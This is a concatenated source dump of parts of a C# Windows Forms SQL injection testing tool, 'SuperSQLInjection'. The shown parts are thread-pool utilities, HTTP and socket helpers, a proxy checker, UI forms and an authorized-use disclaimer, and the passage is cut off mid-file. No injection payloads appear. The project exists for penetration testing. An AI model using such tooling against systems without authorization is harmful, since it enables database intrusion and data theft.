/SuperSQLInjection/tools/http/HttpProxy.cs:
--------------------------------------------------------------------------------
1 | using Amib.Threading.Internal;
2 | using model;
3 | using SuperSQLInjection.model;
4 | using System;
5 | using System.Collections.Generic;
6 | using System.Linq;
7 | using System.Net;
8 | using System.Net.Sockets;
9 | using System.Text;
10 | using tools;
11 |
12 | namespace SuperSQLInjection.tools.http
13 | {
14 | class HttpProxy
15 | {
16 | private static String request = "GET http://{host}:{port}/ HTTP/1.1\r\nHost: {host}:{port}\r\nConnection: close\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n";
17 | public static int ConectProxyUseTime = 0;
18 | public static bool checkConnection(Config config,Proxy proxy) {
19 | String crequest = request.Replace("{host}", config.proxy_check_host).Replace("{port}", config.proxy_check_port.ToString());
20 | ServerInfo server=HTTP.sendRequestRetry(false,config.reTry,proxy.host, proxy.port, "", crequest, config.timeOut, config.encoding, true, false);
21 |
22 | if ((!String.IsNullOrEmpty(server.body)&& server.body.IndexOf(config.proxy_check_Keys)!=-1)||server.header.IndexOf("domain=.baidu.com")!=-1)
23 | {
24 | ConectProxyUseTime = (int)server.runTime;
25 | return true;
26 | }
27 | else {
28 | return false;
29 | }
30 | }
31 |
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/SuperSQLInjection.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SuperSQLInjection", "SuperSQLInjection\SuperSQLInjection.csproj", "{6C2AE3DB-3349-4A1F-9287-9278629CD0D6}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x86 = Debug|x86
12 | Release|Any CPU = Release|Any CPU
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.ActiveCfg = Debug|x86
19 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.Build.0 = Debug|x86
20 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.ActiveCfg = Release|x86
23 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.Build.0 = Release|x86
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/SmartThreadPool.ThreadEntry.cs:
--------------------------------------------------------------------------------
1 |
2 | using System;
3 | using Amib.Threading.Internal;
4 |
5 | namespace Amib.Threading
6 | {
7 | public partial class SmartThreadPool
8 | {
9 | #region ThreadEntry class
10 |
11 | internal class ThreadEntry
12 | {
13 | ///
14 | /// The thread creation time
15 | /// The value is stored as UTC value.
16 | ///
17 | private readonly DateTime _creationTime;
18 |
19 | ///
20 | /// The last time this thread has been running
21 | /// It is updated by IAmAlive() method
22 | /// The value is stored as UTC value.
23 | ///
24 | private DateTime _lastAliveTime;
25 |
26 | ///
27 | /// A reference from each thread in the thread pool to its SmartThreadPool
28 | /// object container.
29 | /// With this variable a thread can know whatever it belongs to a
30 | /// SmartThreadPool.
31 | ///
32 | private readonly SmartThreadPool _associatedSmartThreadPool;
33 |
34 | ///
35 | /// A reference to the current work item a thread from the thread pool
36 | /// is executing.
37 | ///
38 | public WorkItem CurrentWorkItem { get; set; }
39 |
40 | public ThreadEntry(SmartThreadPool stp)
41 | {
42 | _associatedSmartThreadPool = stp;
43 | _creationTime = DateTime.UtcNow;
44 | _lastAliveTime = DateTime.MinValue;
45 | }
46 |
47 | public SmartThreadPool AssociatedSmartThreadPool
48 | {
49 | get { return _associatedSmartThreadPool; }
50 | }
51 |
52 | public void IAmAlive()
53 | {
54 | _lastAliveTime = DateTime.UtcNow;
55 | }
56 | }
57 |
58 | #endregion
59 | }
60 | }
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/STPEventWaitHandle.cs:
--------------------------------------------------------------------------------
1 | #if !(_WINDOWS_CE)
2 |
3 | using System;
4 | using System.Threading;
5 |
6 | namespace Amib.Threading.Internal
7 | {
8 | #if _SILVERLIGHT || WINDOWS_PHONE
9 | internal static class STPEventWaitHandle
10 | {
11 | public const int WaitTimeout = Timeout.Infinite;
12 |
13 | internal static bool WaitAll(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext)
14 | {
15 | return WaitHandle.WaitAll(waitHandles, millisecondsTimeout);
16 | }
17 |
18 | internal static int WaitAny(WaitHandle[] waitHandles)
19 | {
20 | return WaitHandle.WaitAny(waitHandles);
21 | }
22 |
23 | internal static int WaitAny(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext)
24 | {
25 | return WaitHandle.WaitAny(waitHandles, millisecondsTimeout);
26 | }
27 |
28 | internal static bool WaitOne(WaitHandle waitHandle, int millisecondsTimeout, bool exitContext)
29 | {
30 | return waitHandle.WaitOne(millisecondsTimeout);
31 | }
32 | }
33 | #else
34 | internal static class STPEventWaitHandle
35 | {
36 | public const int WaitTimeout = Timeout.Infinite;
37 |
38 | internal static bool WaitAll(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext)
39 | {
40 | return WaitHandle.WaitAll(waitHandles, millisecondsTimeout, exitContext);
41 | }
42 |
43 | internal static int WaitAny(WaitHandle[] waitHandles)
44 | {
45 | return WaitHandle.WaitAny(waitHandles);
46 | }
47 |
48 | internal static int WaitAny(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext)
49 | {
50 | return WaitHandle.WaitAny(waitHandles, millisecondsTimeout, exitContext);
51 | }
52 |
53 | internal static bool WaitOne(WaitHandle waitHandle, int millisecondsTimeout, bool exitContext)
54 | {
55 | return waitHandle.WaitOne(millisecondsTimeout, exitContext);
56 | }
57 | }
58 | #endif
59 |
60 | }
61 |
62 | #endif
--------------------------------------------------------------------------------
/SuperSQLInjection/AddNode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Text;
7 | using System.Windows.Forms;
8 | using tools;
9 |
10 | namespace SuperSQLInjection
11 | {
12 | public partial class AddNode : Form
13 | {
14 | public AddNode()
15 | {
16 | InitializeComponent();
17 | }
18 |
19 | public TreeNode tn = null;
20 | public TreeView tvw = null;
21 | public int type = 0;
22 |
23 | private void btn_addNode_Click(object sender, EventArgs e)
24 | {
25 | if (this.txt_node_text.TextLength <= 0)
26 | {
27 | MessageBox.Show("请输入节点的值!");
28 | return;
29 | }
30 | TreeNode ctn = new TreeNode(this.txt_node_text.Text);
31 | if (type == 1)
32 | {
33 | ctn.Tag = "dbs";
34 |
35 | if (Tools.isExistsNode(tvw.Nodes,this.txt_node_text.Text))
36 | {
37 | MessageBox.Show("已存在相同的节点!");
38 | }
39 | else {
40 | tvw.Nodes.Add(ctn);
41 | }
42 | }
43 |
44 | else {
45 |
46 | if (tn != null)
47 | {
48 | if ("dbs".Equals(tn.Tag))
49 | {
50 | ctn.Tag = "table";
51 | }
52 | else if ("table".Equals(tn.Tag))
53 | {
54 | ctn.Tag = "column";
55 | }
56 | if (Tools.isExistsNode(tn.Nodes, this.txt_node_text.Text))
57 | {
58 | MessageBox.Show("已存在相同的节点!");
59 | }
60 | else
61 | {
62 | tn.Nodes.Add(ctn);
63 | }
64 |
65 | }
66 | else
67 | {
68 | MessageBox.Show("请选择添加表或列对应的数据库或表!");
69 | }
70 | }
71 |
72 |
73 | }
74 | }
75 | }
76 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/http/HttpTools.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Net;
5 | using System.IO;
6 | using System.Net.Sockets;
7 | using System.Text.RegularExpressions;
8 | using model;
9 | using System.Threading;
10 |
11 | namespace tools
12 | {
13 |
14 | class HttpTools
15 | {
16 | public static String getHTMLEncoding(String header){
17 |
18 | Match m=Regex.Match(header, "charset=\\S{0,8}\"");
19 | if (m.Success) {
20 | return m.Groups[0].Value.Replace("charset=","").Replace("\"","");
21 | }
22 | return "";
23 | }
24 | public static String getHtml(String url, int timeout)
25 | {
26 | String html = "";
27 | HttpWebResponse response = null;
28 | StreamReader sr = null;
29 | HttpWebRequest request = null;
30 | try
31 | {
32 |
33 | //设置模拟http访问参数
34 | Uri uri = new Uri(url);
35 | request = (HttpWebRequest)WebRequest.Create(uri);
36 | request.Accept = "*/*";
37 | request.Method = "GET";
38 | request.Timeout = timeout * 1000;
39 | request.AllowAutoRedirect = false;
40 | response = (HttpWebResponse)request.GetResponse();
41 | sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
42 |
43 | //读取服务器端返回的消息
44 | html = sr.ReadToEnd();
45 |
46 | }
47 | catch (Exception e)
48 | {
49 | Tools.SysLog(e.Message);
50 | }
51 | finally
52 | {
53 | if (sr != null)
54 | {
55 | sr.Close();
56 | }
57 | if (response != null)
58 | {
59 | response.Close();
60 | }
61 | if (request != null)
62 | {
63 | request.Abort();
64 | }
65 | }
66 | return html;
67 | }
68 |
69 | }
70 | }
71 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/SynchronizedDictionary.cs:
--------------------------------------------------------------------------------
1 | using System.Collections.Generic;
2 |
3 | namespace Amib.Threading.Internal
4 | {
5 | internal class SynchronizedDictionary
6 | {
7 | private readonly Dictionary _dictionary;
8 | private readonly object _lock;
9 |
10 | public SynchronizedDictionary()
11 | {
12 | _lock = new object();
13 | _dictionary = new Dictionary();
14 | }
15 |
16 | public int Count
17 | {
18 | get { return _dictionary.Count; }
19 | }
20 |
21 | public bool Contains(TKey key)
22 | {
23 | lock (_lock)
24 | {
25 | return _dictionary.ContainsKey(key);
26 | }
27 | }
28 |
29 | public void Remove(TKey key)
30 | {
31 | lock (_lock)
32 | {
33 | _dictionary.Remove(key);
34 | }
35 | }
36 |
37 | public object SyncRoot
38 | {
39 | get { return _lock; }
40 | }
41 |
42 | public TValue this[TKey key]
43 | {
44 | get
45 | {
46 | lock (_lock)
47 | {
48 | return _dictionary[key];
49 | }
50 | }
51 | set
52 | {
53 | lock (_lock)
54 | {
55 | _dictionary[key] = value;
56 | }
57 | }
58 | }
59 |
60 | public Dictionary.KeyCollection Keys
61 | {
62 | get
63 | {
64 | lock (_lock)
65 | {
66 | return _dictionary.Keys;
67 | }
68 | }
69 | }
70 |
71 | public Dictionary.ValueCollection Values
72 | {
73 | get
74 | {
75 | lock (_lock)
76 | {
77 | return _dictionary.Values;
78 | }
79 | }
80 | }
81 | public void Clear()
82 | {
83 | lock (_lock)
84 | {
85 | _dictionary.Clear();
86 | }
87 | }
88 | }
89 | }
90 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/http/TimeOutSocket.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Net;
5 | using System.Net.Sockets;
6 | using System.Text;
7 | using System.Threading;
8 |
9 | namespace SuperSQLInjection.tools.http
10 | {
11 | class TimeOutSocket
12 | {
13 | private bool IsConnectionSuccessful = false;
14 | private Exception socketexception =null;
15 | private ManualResetEvent TimeoutObject = new ManualResetEvent(false);
16 | public int useTime = 0;
17 | public TcpClient Connect(String host,int port,int timeoutMSec)
18 | {
19 | Stopwatch sw = new Stopwatch();
20 | sw.Start();
21 | TimeoutObject.Reset();
22 | socketexception = null;
23 |
24 | TcpClient tcpclient = new TcpClient();
25 |
26 | tcpclient.BeginConnect(host, port,new AsyncCallback(CallBackMethod), tcpclient);
27 |
28 | if (TimeoutObject.WaitOne(timeoutMSec, false))
29 | {
30 | if (IsConnectionSuccessful)
31 | {
32 | sw.Stop();
33 | useTime = (int)sw.ElapsedMilliseconds;
34 | return tcpclient;
35 | }
36 | else
37 | {
38 | throw socketexception;
39 | }
40 | }
41 | else
42 | {
43 | tcpclient.Close();
44 | throw new TimeoutException("TimeOut Exception");
45 | }
46 | }
47 | private void CallBackMethod(IAsyncResult asyncresult)
48 | {
49 | try
50 | {
51 | IsConnectionSuccessful = false;
52 | TcpClient tcpclient = asyncresult.AsyncState as TcpClient;
53 |
54 | if (tcpclient.Client != null)
55 | {
56 | tcpclient.EndConnect(asyncresult);
57 | IsConnectionSuccessful = true;
58 | }
59 | }
60 | catch (Exception ex)
61 | {
62 | IsConnectionSuccessful = false;
63 | socketexception = ex;
64 | }
65 | finally
66 | {
67 | TimeoutObject.Set();
68 | }
69 | }
70 | }
71 | }
72 |
--------------------------------------------------------------------------------
/SuperSQLInjection/FindString.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 |
10 | namespace SuperSQLInjection
11 | {
12 | public partial class FindString : Form
13 | {
14 | public FindString()
15 | {
16 | InitializeComponent();
17 | }
18 | public int searchPoint = 0;
19 | public RichTextBox txtbox = null;
20 | private void btn_find_Click(object sender, EventArgs e)
21 | {
22 | //查找下一个
23 |
24 | if (txtbox.Text == "")
25 | {
26 | //没内容
27 | MessageBox.Show("查找内容为空,请输入查找内容", "", MessageBoxButtons.OK, MessageBoxIcon.Error);
28 | }
29 | else
30 | {
31 | //有查找内容时
32 | searchPoint = txtbox.Text.IndexOf(this.txt_key.Text, searchPoint);//用IndexOf索引
33 | if (searchPoint < 0)
34 | {
35 | //没找到
36 | MessageBox.Show("已到文本末尾,没有找到", "提示", MessageBoxButtons.OK, MessageBoxIcon.Information);
37 | searchPoint = 0;
38 | }
39 | else
40 | {
41 | //找到了,选中文本
42 | txtbox.Focus();
43 | txtbox.SelectionStart = searchPoint;
44 | txtbox.SelectionLength = this.txt_key.Text.Length;
45 | //txtbox.Select(searchPoint, this.txt_key.Text.Length);
46 | searchPoint = searchPoint + this.txt_key.Text.Length;
47 | //this.Focus();
48 |
49 | }
50 | }
51 | }
52 |
53 | private void txt_key_TextChanged(object sender, EventArgs e)
54 | {
55 | int count = 0; //计数器
56 | string search = this.txt_key.Text; //要查的字符串
57 | if ("".Equals(search))
58 | {
59 | return;
60 | }
61 |
62 | for (int i = 0; i <= txtbox.Text.Length - search.Length; i++)
63 | {
64 | if (txtbox.Text.Substring(i, search.Length).ToLower() == search.ToLower())
65 | {
66 | count++;
67 | }
68 | }
69 | this.label2.Text = "匹配:"+count.ToString();
70 | }
71 | }
72 | }
73 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/SerializableDictionary.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Xml;
6 | using System.Xml.Schema;
7 | using System.Xml.Serialization;
8 |
9 | namespace SuperSQLInjection.model
10 | {
11 |
12 | [Serializable]
13 | public class SerializableDictionary : Dictionary, IXmlSerializable
14 | {
15 | public SerializableDictionary() { }
16 | public void WriteXml(XmlWriter write) // Serializer
17 | {
18 | XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
19 | XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));
20 |
21 | foreach (KeyValuePair kv in this)
22 | {
23 | write.WriteStartElement("SerializableDictionary");
24 | write.WriteStartElement("key");
25 | KeySerializer.Serialize(write, kv.Key);
26 | write.WriteEndElement();
27 | write.WriteStartElement("value");
28 | ValueSerializer.Serialize(write, kv.Value);
29 | write.WriteEndElement();
30 | write.WriteEndElement();
31 | }
32 | }
33 | public void ReadXml(XmlReader reader) // Deserializer
34 | {
35 | reader.Read();
36 | XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
37 | XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));
38 |
39 | while (reader.NodeType != XmlNodeType.EndElement)
40 | {
41 |
42 | reader.ReadStartElement("SerializableDictionary");
43 | reader.ReadStartElement("key");
44 | TKey tk = (TKey)KeySerializer.Deserialize(reader);
45 | reader.ReadEndElement();
46 | reader.ReadStartElement("value");
47 | TValue vl = (TValue)ValueSerializer.Deserialize(reader);
48 | reader.ReadEndElement();
49 | reader.ReadEndElement();
50 | this.Add(tk, vl);
51 | reader.MoveToContent();
52 | }
53 | reader.ReadEndElement();
54 |
55 | }
56 | public XmlSchema GetSchema()
57 | {
58 | return null;
59 | }
60 | }
61 | }
62 |
63 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/WorkItemInfo.cs:
--------------------------------------------------------------------------------
1 | namespace Amib.Threading
2 | {
3 | #region WorkItemInfo class
4 |
5 | ///
6 | /// Summary description for WorkItemInfo.
7 | ///
8 | public class WorkItemInfo
9 | {
10 | public WorkItemInfo()
11 | {
12 | UseCallerCallContext = SmartThreadPool.DefaultUseCallerCallContext;
13 | UseCallerHttpContext = SmartThreadPool.DefaultUseCallerHttpContext;
14 | DisposeOfStateObjects = SmartThreadPool.DefaultDisposeOfStateObjects;
15 | CallToPostExecute = SmartThreadPool.DefaultCallToPostExecute;
16 | PostExecuteWorkItemCallback = SmartThreadPool.DefaultPostExecuteWorkItemCallback;
17 | WorkItemPriority = SmartThreadPool.DefaultWorkItemPriority;
18 | }
19 |
20 | public WorkItemInfo(WorkItemInfo workItemInfo)
21 | {
22 | UseCallerCallContext = workItemInfo.UseCallerCallContext;
23 | UseCallerHttpContext = workItemInfo.UseCallerHttpContext;
24 | DisposeOfStateObjects = workItemInfo.DisposeOfStateObjects;
25 | CallToPostExecute = workItemInfo.CallToPostExecute;
26 | PostExecuteWorkItemCallback = workItemInfo.PostExecuteWorkItemCallback;
27 | WorkItemPriority = workItemInfo.WorkItemPriority;
28 | Timeout = workItemInfo.Timeout;
29 | }
30 |
31 | ///
32 | /// Get/Set if to use the caller's security context
33 | ///
34 | public bool UseCallerCallContext { get; set; }
35 |
36 | ///
37 | /// Get/Set if to use the caller's HTTP context
38 | ///
39 | public bool UseCallerHttpContext { get; set; }
40 |
41 | ///
42 | /// Get/Set if to dispose of the state object of a work item
43 | ///
44 | public bool DisposeOfStateObjects { get; set; }
45 |
46 | ///
47 | /// Get/Set the run the post execute options
48 | ///
49 | public CallToPostExecute CallToPostExecute { get; set; }
50 |
51 | ///
52 | /// Get/Set the post execute callback
53 | ///
54 | public PostExecuteWorkItemCallback PostExecuteWorkItemCallback { get; set; }
55 |
56 | ///
57 | /// Get/Set the work item's priority
58 | ///
59 | public WorkItemPriority WorkItemPriority { get; set; }
60 |
61 | ///
62 | /// Get/Set the work item's timout in milliseconds.
63 | /// This is a passive timout. When the timout expires the work item won't be actively aborted!
64 | ///
65 | public long Timeout { get; set; }
66 | }
67 |
68 | #endregion
69 | }
70 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Waring.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace SuperSQLInjection
2 | {
3 | partial class Waring
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Windows Form Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | this.richTextBox1 = new System.Windows.Forms.RichTextBox();
32 | this.SuspendLayout();
33 | //
34 | // richTextBox1
35 | //
36 | this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
37 | | System.Windows.Forms.AnchorStyles.Left)
38 | | System.Windows.Forms.AnchorStyles.Right)));
39 | this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
40 | this.richTextBox1.Location = new System.Drawing.Point(12, 12);
41 | this.richTextBox1.Name = "richTextBox1";
42 | this.richTextBox1.ReadOnly = true;
43 | this.richTextBox1.Size = new System.Drawing.Size(463, 94);
44 | this.richTextBox1.TabIndex = 0;
45 | this.richTextBox1.Text = "本工具提供给个人、站长、企业、渗透测试工程师、Web安全工程师等信息安全人员进行信息安全检查工具,请勿利用此工具进行非授权测试,产生的法律责任与作者无关。\n作者:" +
46 | "shack2\nQQ:1341413415\n官网:www.shack2.org";
47 | //
48 | // Waring
49 | //
50 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
51 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
52 | this.ClientSize = new System.Drawing.Size(487, 117);
53 | this.Controls.Add(this.richTextBox1);
54 | this.Name = "Waring";
55 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
56 | this.Text = "声 明";
57 | this.ResumeLayout(false);
58 |
59 | }
60 |
61 | #endregion
62 |
63 | private System.Windows.Forms.RichTextBox richTextBox1;
64 | }
65 | }
--------------------------------------------------------------------------------
/SuperSQLInjection/About.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace SuperSQLInjection
2 | {
3 | partial class About
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Windows Form Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(About));
32 | this.richTextBox1 = new System.Windows.Forms.RichTextBox();
33 | this.SuspendLayout();
34 | //
35 | // richTextBox1
36 | //
37 | this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
38 | | System.Windows.Forms.AnchorStyles.Left)
39 | | System.Windows.Forms.AnchorStyles.Right)));
40 | this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
41 | this.richTextBox1.Location = new System.Drawing.Point(12, 12);
42 | this.richTextBox1.Name = "richTextBox1";
43 | this.richTextBox1.ReadOnly = true;
44 | this.richTextBox1.Size = new System.Drawing.Size(571, 326);
45 | this.richTextBox1.TabIndex = 2;
46 | this.richTextBox1.Text = resources.GetString("richTextBox1.Text");
47 | //
48 | // About
49 | //
50 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
51 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
52 | this.ClientSize = new System.Drawing.Size(595, 351);
53 | this.Controls.Add(this.richTextBox1);
54 | this.Name = "About";
55 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
56 | this.Text = "关 于";
57 | this.ResumeLayout(false);
58 |
59 | }
60 |
61 | #endregion
62 |
63 | private System.Windows.Forms.RichTextBox richTextBox1;
64 |
65 |
66 |
67 |
68 | }
69 | }
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/Stopwatch.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace Amib.Threading.Internal
4 | {
5 | ///
6 | /// Stopwatch class
7 | /// Used with WindowsCE and Silverlight which don't have Stopwatch
8 | ///
9 | internal class Stopwatch
10 | {
11 | private long _elapsed;
12 | private bool _isRunning;
13 | private long _startTimeStamp;
14 |
15 | public Stopwatch()
16 | {
17 | Reset();
18 | }
19 |
20 | private long GetElapsedDateTimeTicks()
21 | {
22 | long rawElapsedTicks = GetRawElapsedTicks();
23 | return rawElapsedTicks;
24 | }
25 |
26 | private long GetRawElapsedTicks()
27 | {
28 | long elapsed = _elapsed;
29 | if (_isRunning)
30 | {
31 | long ticks = GetTimestamp() - _startTimeStamp;
32 | elapsed += ticks;
33 | }
34 | return elapsed;
35 | }
36 |
37 | public static long GetTimestamp()
38 | {
39 | return DateTime.UtcNow.Ticks;
40 | }
41 |
42 | public void Reset()
43 | {
44 | _elapsed = 0L;
45 | _isRunning = false;
46 | _startTimeStamp = 0L;
47 | }
48 |
49 | public void Start()
50 | {
51 | if (!_isRunning)
52 | {
53 | _startTimeStamp = GetTimestamp();
54 | _isRunning = true;
55 | }
56 | }
57 |
58 | public static Stopwatch StartNew()
59 | {
60 | Stopwatch stopwatch = new Stopwatch();
61 | stopwatch.Start();
62 | return stopwatch;
63 | }
64 |
65 | public void Stop()
66 | {
67 | if (_isRunning)
68 | {
69 | long ticks = GetTimestamp() - _startTimeStamp;
70 | _elapsed += ticks;
71 | _isRunning = false;
72 | }
73 | }
74 |
75 | // Properties
76 | public TimeSpan Elapsed
77 | {
78 | get
79 | {
80 | return new TimeSpan(GetElapsedDateTimeTicks());
81 | }
82 | }
83 |
84 | public long ElapsedMilliseconds
85 | {
86 | get
87 | {
88 | return (GetElapsedDateTimeTicks() / 0x2710L);
89 | }
90 | }
91 |
92 | public long ElapsedTicks
93 | {
94 | get
95 | {
96 | return GetRawElapsedTicks();
97 | }
98 | }
99 |
100 | public bool IsRunning
101 | {
102 | get
103 | {
104 | return _isRunning;
105 | }
106 | }
107 | }
108 | }
109 |
--------------------------------------------------------------------------------
/SuperSQLInjection/AddNode.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace SuperSQLInjection
2 | {
3 | partial class AddNode
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Windows Form Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | this.btn_addNode = new System.Windows.Forms.Button();
32 | this.txt_node_text = new System.Windows.Forms.TextBox();
33 | this.SuspendLayout();
34 | //
35 | // btn_addNode
36 | //
37 | this.btn_addNode.Location = new System.Drawing.Point(192, 21);
38 | this.btn_addNode.Name = "btn_addNode";
39 | this.btn_addNode.Size = new System.Drawing.Size(56, 23);
40 | this.btn_addNode.TabIndex = 0;
41 | this.btn_addNode.Text = "添 加";
42 | this.btn_addNode.UseVisualStyleBackColor = true;
43 | this.btn_addNode.Click += new System.EventHandler(this.btn_addNode_Click);
44 | //
45 | // txt_node_text
46 | //
47 | this.txt_node_text.Location = new System.Drawing.Point(21, 21);
48 | this.txt_node_text.Name = "txt_node_text";
49 | this.txt_node_text.Size = new System.Drawing.Size(152, 21);
50 | this.txt_node_text.TabIndex = 1;
51 | //
52 | // AddNode
53 | //
